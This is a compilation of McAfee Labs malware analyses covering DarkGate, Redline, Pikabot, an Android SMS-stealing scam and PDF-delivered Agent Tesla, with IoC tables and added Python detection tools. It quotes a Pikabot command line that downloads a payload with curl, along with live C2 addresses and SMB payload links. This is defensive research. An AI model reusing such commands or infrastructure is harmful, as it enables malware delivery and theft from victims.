On allowing execution, the VBS file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file runs automatically on execution of the .url file, and we get the following process tree:
Figure 10: Process tree
Following are the command lines:
The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).
Inspecting the URL “withupdate.com/zuyagaoq” gives a detailed understanding of the infection flow:
Figure 11: Remote Script on the C2
This URL leads to a script:
Figure 13: Remote script content
Explanation of the script:
Checking “C:/rjtu”:
Figure 14: Dropped folder
AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.
To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).
Following is the ahk script file content:
Figure 15: Content of .ahk script
A lot of comments have been added to the script; after simplifying it, we get:
Figure 16: .ahk script after removing junk
This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.
Now it is confirmed that the shellcode resides within the contents of “test.txt”. This is how test.txt appears:
Figure 17: Content of test.txt
We analyzed the memory in use for Autohotkey.exe.
Figure 19: Memory dump of running AutoHotKey.exe same as test.txt
This is the shellcode present here. The first 6 bytes are assembly instructions:
Following the jump instruction of 3bf bytes, we reach the same set of instructions again:
Figure 21: Same Shellcode A after jump
This means another jump will be taken, for another 3bf bytes:
Figure 22: Same Shellcode A one more time
We encounter the same set of instructions again; taking another jump, we reach:
Figure 23: New Shellcode B found next.
These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.
Figure 24: Shellcode B followed by PE file highlighted
This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:
Figure 25: After debugging found next Shellcode C
This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.
Figure 26: Shellcode C directing to entry point of the PE file
Upon debugging this code, we found that at the marked “call eax” instruction, eax holds the address of the entry point of the final DarkGate payload. This instruction therefore moves the instruction pointer to the entry point of the PE file, the region marked in yellow in Figure 24.
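As an added example (not part of the original write-up), the following Python tool automates the jump-chain walk described above: it follows relative jmp stubs until a non-jump stage is reached, flags when the same stub repeats, and then locates the embedded PE and its entry-point RVA. The blob it runs on is constructed here and only mimics the layout (three copies of stub A, stage B, a PE header, stage C); it assumes each stub's jump is a plain near jmp lying within the stub's first 6 bytes.

```python
import struct

# Relative jump encodings the walker understands. Assumption: the loader's hops
# are plain near jumps; any other instruction ends the walk.
JMP_REL32 = 0xE9
JMP_REL8 = 0xEB
MAX_HOPS = 64


def load_hex_text(text: str) -> bytes:
    """test.txt holds the shellcode as hex digits; turn it back into raw bytes."""
    return bytes.fromhex("".join(text.split()))


def decode_jump(blob: bytes, off: int):
    """Return (length, target) when a relative jmp starts at `off`, else None."""
    if off >= len(blob):
        return None
    op = blob[off]
    if op == JMP_REL32 and off + 5 <= len(blob):
        rel = struct.unpack_from("<i", blob, off + 1)[0]
        return 5, off + 5 + rel
    if op == JMP_REL8 and off + 2 <= len(blob):
        rel = struct.unpack_from("<b", blob, off + 1)[0]
        return 2, off + 2 + rel
    return None


def follow_jumps(blob: bytes, start: int = 0, stub_len: int = 6) -> dict:
    """Walk the chain of jump stubs beginning at `start`.

    Each stub is at most `stub_len` bytes and the jmp may sit after a short
    lead-in instruction, so every byte of the stub is tried as a jmp start
    (a heuristic: a stray 0xE9/0xEB data byte would also be taken as a jump).
    The walk stops at the first location holding no jump, i.e. the next stage.
    """
    off, chain, seen, repeated = start, [], set(), False
    while len(chain) < MAX_HOPS:
        if not 0 <= off < len(blob):
            raise ValueError(f"jump target {off:#x} lies outside the blob")
        stub = bytes(blob[off:off + stub_len])
        hop = next((h for h in (decode_jump(blob, off + i) for i in range(stub_len)) if h), None)
        if hop is None:
            break
        repeated = repeated or stub in seen
        seen.add(stub)
        chain.append(off)
        off = hop[1]
    return {"chain": chain, "landing": off, "repeated_stub": repeated}


def find_pe(blob: bytes, start: int = 0):
    """Locate the first embedded PE image at or after `start`.

    Returns (mz_offset, entry_point_rva) or None. e_lfanew is read from the
    DOS header and the PE signature must match, so stray "MZ" text is skipped.
    """
    pos = start
    while True:
        mz = blob.find(b"MZ", pos)
        if mz < 0 or mz + 0x40 > len(blob):
            return None
        e_lfanew = struct.unpack_from("<I", blob, mz + 0x3C)[0]
        pe = mz + e_lfanew
        if 0x40 <= e_lfanew < 0x1000 and pe + 44 <= len(blob) and blob[pe:pe + 4] == b"PE\0\0":
            # AddressOfEntryPoint is 16 bytes into the optional header, which
            # follows the 4-byte signature and the 20-byte COFF header.
            return mz, struct.unpack_from("<I", blob, pe + 24 + 16)[0]
        pos = mz + 2


def analyze(blob: bytes) -> dict:
    """Follow the jump chain from offset 0, then look for the PE past the landing."""
    result = follow_jumps(blob)
    pe = find_pe(blob, result["landing"])
    result["pe_offset"] = pe[0] if pe else None
    result["entry_rva"] = pe[1] if pe else None
    return result


def build_sample() -> bytes:
    """Constructed stand-in for test.txt (not the real sample): three copies of
    stub A (nop; jmp +0x3bf), then stage B, a minimal PE header, and stage C."""
    stub_a = b"\x90\xE9" + struct.pack("<i", 0x3BF)
    hop = len(stub_a) + 0x3BF                 # distance between stub copies
    out = bytearray()
    for _ in range(3):
        out += stub_a.ljust(hop, b"\x00")
    out += b"\x55\x8B\xEC" + b"\x00" * 0x10   # stage B: push ebp; mov ebp,esp; filler
    dos = bytearray(b"MZ".ljust(0x40, b"\x00"))
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew -> PE signature
    opt = bytearray(224)                      # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)     # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1000)   # AddressOfEntryPoint
    out += dos + b"PE\0\0" + bytes(20) + opt
    out += b"\x00" * 0x20 + b"\xC3"           # stage C stand-in
    return bytes(out)


if __name__ == "__main__":
    blob = load_hex_text(build_sample().hex())   # round-trip through hex like test.txt
    res = analyze(blob)
    print("stubs at:", [hex(o) for o in res["chain"]], "repeated:", res["repeated_stub"])
    print("landing:", hex(res["landing"]), "PE at:", hex(res["pe_offset"]),
          "entry RVA:", hex(res["entry_rva"]))
```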
This is the final DarkGate payload which is a Delphi-compiled executable file:
Figure 27: Darkgate payload.
After this, we see network activity to the C2 site:
Figure 28: Network Communication
Figure 29: C2 IP address
The exfiltration is done to the IP address 5.252.177.207.
Persistence:
To maintain persistence, a .lnk file is dropped in the Startup folder:
Figure 30: Persistence
Content of lnk file:
Figure 31: Content of .lnk used for persistence
The shortcut file (lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.
Figure 32: Folder dropped in “C:\ProgramData”
Inside this folder, all the same files are present:
Figure 33: Same set of files present in dropped folder
Again, the .ahk file is executed via Autohotkey.exe and the shellcode in test.txt runs. These files have the same SHA256 value, differing only in their assigned names.
Infection from XLS:
The malicious Excel file asks the user to click on “Open” to view the content properly.
Figure 34: XLS sample
Upon clicking the “Open” button, the user gets the following prompt warning them before the file is opened.
Figure 35: XLS files trying to download and run VBS file
For our analysis, we allowed the activity by clicking “OK”. This produced the following process tree:
Figure 36: Process tree from Excel file
The command lines are:
The file it gets from “103.124.106[.]237/wctaehcw” has the following content:
Figure 37: Remote script similar to previous chain
From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.
Mitigation:
Indicators of Compromise (IoCs):
| File | Hash |
|---|---|
| Html file | 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005 |
| URL file | 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833 |
| VBS | 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907 |
| autohotkey.exe | 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb |
| AHK script | dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455 |
| test.txt | 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795 |
| DarkGate exe | 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031 |
| IP | 5.252.177.207 |
| XLS file | 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4 |
| VBS | 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f |
| LNK file | 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e |
| IP | 103.124.106.237 |
Table 1: IOC table
The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.
Authored by Mohansundaram M and Neil Tyagi
Source: Add a Custom Script to Windows Setup | Microsoft Learn
We can confirm that c:\WINDOWS\system32\oobe\Setup.exe launches cmd.exe with the ErrorHandler.cmd script as argument, which runs NzUw.exe (compiler.exe).
Before loading the luajit bytecode, a new state is created. Each Lua state maintains its global environment, stack, and set of loaded libraries, providing isolation between different instances of Lua code.
| File | SHA256 / URL |
|---|---|
| Cheat.Lab.2.7.2.zip | 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610 |
| Cheat.Lab.2.7.2.zip | https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip |
| lua51.dll | 873aa2e88dbc2efa089e6efd1c8a5370e04c9f5749d7631f2912bcb640439997 |
| readme.txt | 751f97824cd211ae710655e60a26885cd79974f0f0a5e4e582e3b635492b4cad |
| compiler.exe | dfbf23697cfd9d35f263af7a455351480920a95bfc642f3254ee8452ce20655a |
| Redline C2 | 213[.]248[.]43[.]58 |
| Trojanised Git Repo | hxxps://github.com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip |
The post Redline Stealer: A Novel Approach appeared first on McAfee Blog.
Authored by Anuradha and Preksha
PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.
PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.
SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.
During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.
Pikabot is distributed through multiple file types, depending on the objectives and nature of the attack. Using multiple file types lets attackers exploit diverse attack vectors: different file formats have different vulnerabilities and are detected differently by security software, so attackers try various formats to increase their chances of success and evade specific security measures.
Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.
Figure 1. Distinctive Campaigns of Pikabot
Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.
It is uncommon for an adversary to deploy so many attack vectors in the span of a month.
This section presents a comprehensive breakdown of the analysis for each campaign.
In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.
The HTML code below is a snippet from the malware. It is well-formed HTML whose body contains a meta redirection to a remote text file hosted at the specified URL. The HTML also contains distractions that are not rendered by the browser.
Figure 2.HTML Code
The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.
Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:
Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.
Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.
Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.
In this campaign, McAfee blocks the HTML file.
Figure 3.HTML file
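As an added example (not code from the original post), the following Python checker parses an HTML attachment for meta refresh tags and flags any whose target is a file:// URL or UNC path, which is the redirection described above. The lure HTML it runs on is constructed here and only reuses the URL quoted in the text.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# URL schemes that make the browser reach for a network share instead of a web server.
SHARE_SCHEMES = {"file", "smb"}


def parse_refresh_content(content: str):
    """Parse the meta refresh value ('0;url=...') into (delay_seconds, url)."""
    m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"]+)", content, re.I)
    if not m:
        return None
    return int(m.group(1)), m.group(2).strip()


class MetaRefreshFinder(HTMLParser):
    """Collects every <meta http-equiv="refresh"> target, wherever it sits in the
    document (the lure buries it among filler that never renders)."""

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lower-cases attribute names
        if a.get("http-equiv", "").lower() == "refresh" and "content" in a:
            parsed = parse_refresh_content(a["content"])
            if parsed:
                self.refreshes.append(parsed)


def find_share_redirects(html: str) -> list:
    """Return the meta refreshes whose target is a file:// URL or a UNC path."""
    parser = MetaRefreshFinder()
    parser.feed(html)
    hits = []
    for delay, url in parser.refreshes:
        parsed = urlparse(url)
        if parsed.scheme.lower() in SHARE_SCHEMES or url.startswith("\\\\"):
            hits.append({"delay": delay, "url": url, "host": parsed.hostname})
    return hits


# Constructed lure modelled on the campaign: unrendered filler plus the refresh.
LURE_HTML = """<html><head><title>Invoice</title>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=file://204.44.125.68/mcqef/yPXpC.txt">
</head><body><!-- lorem ipsum distraction --><div style="display:none">nothing here</div>
</body></html>"""

# Constructed benign page: an ordinary HTTPS refresh that must not be flagged.
BENIGN_HTML = '<meta http-equiv="refresh" content="5;url=https://example.com/home">'

if __name__ == "__main__":
    for label, doc in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(label, find_share_redirects(doc))
```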
Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.
Infection Chain:
.zip->.js->curl->.exe
Code snippet of .js file:
Figure 4. Javascript Code
When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.
Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.
Command line:
"C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
McAfee blocks both the JavaScript and the EXE file, thus keeping McAfee customers safe from this campaign.
Figure 5. JS file
Figure 6. EXE file
In this campaign, the malware leverages the MonikerLink bug. It is distributed through email replies to older thread discussions, in which recipients receive a link to download the payload from an SMB share; the link is present directly in the Outlook mail.
Infection Chain:
EML ->SMB share link->.zip->.exe
Spam Email:
Figure 7. Spam email with SMB share link
SMB Share link: file://newssocialwork.com/public/FNFY.zip
In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.
Figure 8. EXE file
Figure 9. Face in Excel
Infection Chain:
.zip > .xls > .js > .dll
This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”
Hovering over the “Open” button reveals an SMB file share link: file:///\\85.195.115.20\share\reports_02.15.2024_1.js
Bundled files in Excel:
Figure 10. Bundled files inside Excel
The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.
The hyperlink is present in the below relationship file.
Figure 11. XML relationship file
Content of relationship file:
Figure 12. xl/drawings/_rels/drawing1.xml.rels
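An added example, not part of the original analysis: because the hyperlink lives in a relationship part rather than a macro, a scanner can open the .xlsx as a zip and inspect every .rels file for External relationships that point at a share. The sample workbook is constructed inline (its relationship layout and share URL follow the text above); the OOXML namespaces are the standard ones.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Standard Open Packaging Conventions namespaces.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def is_share_target(target: str) -> bool:
    """True for file:// URLs and UNC paths, both of which Office resolves over SMB."""
    t = target.strip()
    return t.startswith("\\\\") or t.startswith("//") or urlparse(t).scheme.lower() in {"file", "smb"}


def share_host(target: str):
    """Best-effort host extraction that also copes with the file:///\\host\\share form."""
    parsed = urlparse(target)
    if parsed.hostname:
        return parsed.hostname
    rest = (parsed.path if parsed.scheme else target).lstrip("\\/")
    return re.split(r"[\\/]", rest, maxsplit=1)[0] or None


def scan_ooxml_links(document: bytes) -> list:
    """Open the package as a zip and report every External relationship in any
    .rels part whose target is a network share (works for .xlsx/.docx/.pptx)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(document)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and is_share_target(target):
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                        "host": share_host(target),
                    })
    return findings


def build_sample_xlsx() -> bytes:
    """Constructed minimal package (not the real sample): one share hyperlink in
    the drawing relationships next to a benign https link."""
    rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.com/help" TargetMode="External"/>
  <Relationship Id="rId2" Type="{HYPERLINK_TYPE}" Target="file:///\\\\85.195.115.20\\share\\reports_02.15.2024_1.js" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
        zf.writestr("xl/drawings/_rels/drawing1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_ooxml_links(build_sample_xlsx()):
        print(f"{hit['part']}: {hit['id']} ({hit['type']}) -> {hit['target']} [host {hit['host']}]")
```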
Code of JS file:
Figure 13. Obfuscated javascript code
The JS file contains mostly junk code and a small piece of malicious code that downloads the payload DLL, saved as “nh.jpg”.
Figure 14. Calling regsvr32.exe
The downloaded DLL payload is executed by regsvr32.exe.
In this campaign, McAfee blocks the XLSX file.
Figure 15. XLSX file
In this campaign, distribution was through a compressed zip file containing a .jar file, which on execution drops the DLL payload.
Infection Chain:
.zip > .jar > .dll
On extraction, the below files are found inside the jar file.
Figure 16. Extraction of JAR file
The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.
On execution, the jar file loads the file “163520” as a resource and drops it to the %temp% location with a .png extension; this is the payload DLL.
Figure 17. Payload with .png extension
Following this, java.exe initiates the execution of regsvr32.exe to run the payload.
In this campaign, McAfee blocks both the JAR and DLL files.
Figure 18. JAR file
Figure 19. DLL file
Due to a relatively high entropy of the resource section, the sample appears packed.
Figure 20. Loader Entropy
Initially, the malware allocates memory using VirtualAlloc() and then uses a custom decryption loop to decrypt the data, resulting in a PE file.
Figure 21. Decryption Loop
Figure 22. Decrypted to get the PE file
Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”
Figure 23. Injection with ctfmon.exe
To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.
Figure 24. Mutex
The malware collects data from the victim machine and sends it to the C2 server.
Figure 25. Network activity
PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc.).
Figure 26. Network activity
Figure 27. C2 communication
C2 found in the payload are:
178.18.246.136:2078
86.38.225.106:2221
57.128.165.176:1372
| File Type | SHA 256 |
|---|---|
| ZIP | 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a |
| HTML | 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82 |
| ZIP | 4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd |
| JS | 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849 |
| EXE | 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 |
| ZIP | f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512 |
| EXE | aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1 |
| XLSX | bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5 |
| JS | 49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72 |
| ZIP | d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04 |
| JAR | d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4 |
| DLL | 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e |
The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.
Authored by ZePeng Chen and Wenfeng Yu
McAfee Mobile Research Team has observed an active scam malware campaign targeting Android users in India. This malware has gone through three stages. The first one is the development stage, from March 2023 to July 2023, during which a couple of applications were created each month. The second is the expansion stage, from August 2023 to October 2023, during which dozens of applications were created each month. The third is the active stage, from September 2023 to the present, during which hundreds of applications were created each month. According to McAfee’s detection telemetry data, this malware has accumulated over 800 applications and has infected more than 3,700 Android devices. The campaign is still ongoing, and the number of infected devices will continue to rise.
Malware developers create phishing pages for scenarios that are easy to deceive, such as electricity bill payments, hospital appointments, and courier package bookings. Developers use different applications to load different phishing pages, which are eventually sold to scammers. In our research, more than 100 unique phishing URLs and more than 100 unique C2 URLs are created in these malicious applications. It means that each scammer can carry out scam activities independently.
Scammers use malware to attack victims. They typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services. This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app and submit personal information. There was a report where an Indian woman downloaded malware from a link in WhatsApp and about ₹98,000 was stolen from her. We were not able to confirm if it is the same malware, but it is just one example of how these malicious applications can be distributed directly via WhatsApp.
Because the attack scenario appears credible, many victims do not doubt the scammers’ intentions. Following the instructions provided, they download and install the app. In the app, victims are induced to submit sensitive information such as personal phone numbers, addresses, bank card numbers, and passwords. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account.
The malware not only steals victims’ bank account information via phishing web pages but also steals SMS messages on victims’ devices. Because of the stolen information, even if the bank account supports OTP authentication, the scammer can transfer all the funds. The malware uses legitimate platforms to deploy phishing pages to make it appear more trustworthy to evade detection.
McAfee Mobile Security detects this threat as Android/SmsSpy. For more information, and to get fully protected, visit McAfee Mobile Security.
We discovered that these phishing pages and malware were being sold as a service by a cyber group named ELVIA INFOTECH. A distinct difference between this malware and others is that the apps sold have a valid expiration date. When the expiration date is reached, some application links will redirect to a payment notification page. The notification is clearly to request the purchaser to pay a fee to restore the use of the malware.
Figure 1. Payment notification.
We also discovered that the cybercriminal group was selling malware in a Telegram group. Based on these observations, we believe that ELVIA INFOTECH is a professional cybercriminal organization engaged in the development, maintenance, and sale of malware and phishing websites.
Figure 2. Telegram Group conversation.
This malware has been maintained and recently updated, and hundreds of malicious applications have been created. They favor file names such as “CustomerSupport.apk”, “Mahavitaran Bill Update.apk”, “Appointment Booking.apk”, “Hospital Support.apk” and “Emergency Courier.apk”, and application names such as “Customer Support”, “Blue Dart”, “Hospital Support” and “Emergency Courier”, to trick victims. Below are some of the applications’ names and icons.
Figure 3. Some applications’ names and icons
Not only do they pretend to be “Customer Support”; they also impersonate popular courier companies in India like “Blue Dart”, and they target utility companies like “Mahavitaran” (Power Corporation of India).
Once victims click the fake icon, the application will be launched and start to attack victims.
1. Loading Phishing Pages
The phishing page loads once the application is launched. It will disguise itself as a page of various legitimate services, making victims believe that they are visiting a legitimate service website. Here, victims are tricked into providing sensitive information such as name, address, phone number, bank card number, and password. However, once submitted, this information falls into the hands of scammers, allowing them to easily access and control the victim’s bank account.
We found that most of this attack campaign impersonated courier package delivery companies.
Figure 4. Phishing Pages Load Once App Launches
The malware developers also designed different phishing pages for different applications to deceive victims in different scenarios that exploit electricity bill payments and hospital appointments.
Figure 5. Hospital appointment and Electricity Bill Phishing Pages
2. Stealing One-Time Passwords via SMS message
As a core design of this malware, the application requests permissions to allow it to send and view SMS messages once it launches.
Figure 6. Request SMS permissions.
If victims click the “Allow” button, the malware starts a background service that secretly monitors users’ text messages and forwards them to a phone number obtained from the C2 server.
Figure 7. Forward phone number from C2 server
This step is crucial for the scam process, as many banks send a one-time password (OTP) to the customer’s phone for transaction verification. Using this method, the scammers can obtain these OTPs and successfully complete bank transactions.
This malicious app and the developers behind it have emerged rapidly in India from last year to now, purposefully developing and maintaining malware, and focusing on deploying well-designed phishing websites through legitimate platforms. The group secretly promotes and sells its malware through social media platforms, making the spread of the malware more subtle and difficult to detect. This tactic resulted in an even more severe malware outbreak, posing an ongoing and serious threat to the financial security of Indian users.
Malware campaigns are very persistent and using multiple different applications on different websites can trick many victims into installing these applications and providing their private and personal information, which can then be used to commit fraud. In this environment, ordinary users in India face huge cybersecurity challenges. Therefore, users need to remain vigilant and cautious when dealing with any electronic communications or application download requests that appear legitimate but may contain malware. We strongly recommend users install security software on their devices and always keep it up to date. By using McAfee Mobile Security products, users can further protect their devices and reduce the risks associated with this type of malware, providing a more secure experience.
Indicators of Compromise (IOCs)
SHA256 hash List:
Phishing URLs:
C2 Server URLs:
The post Android Phishing Scam Using Malware-as-a-Service on the Rise in India appeared first on McAfee Blog.
Authored by Yashvi Shah and Preksha Saxena
McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently harmless emails, particularly within the PDF file attachments accompanying them. The subsequent trend observed in the past three months through McAfee telemetry pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.
Figure 1: Rise in PDF malware
Upon implementing Microsoft’s macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an enticing avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.
This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the dissemination of the ultimate payload. In the outdated and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which facilitates process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:
Figure 2: Infection Chain
Firstly, we shall address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.
In a recent attack, a file named “Booking.com-1728394029.pdf” was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, “Lettore non è compatibile!”, which translates to “Player is not compatible,” as depicted in the provided Figure below.
Figure 3: Face of PDF attachment
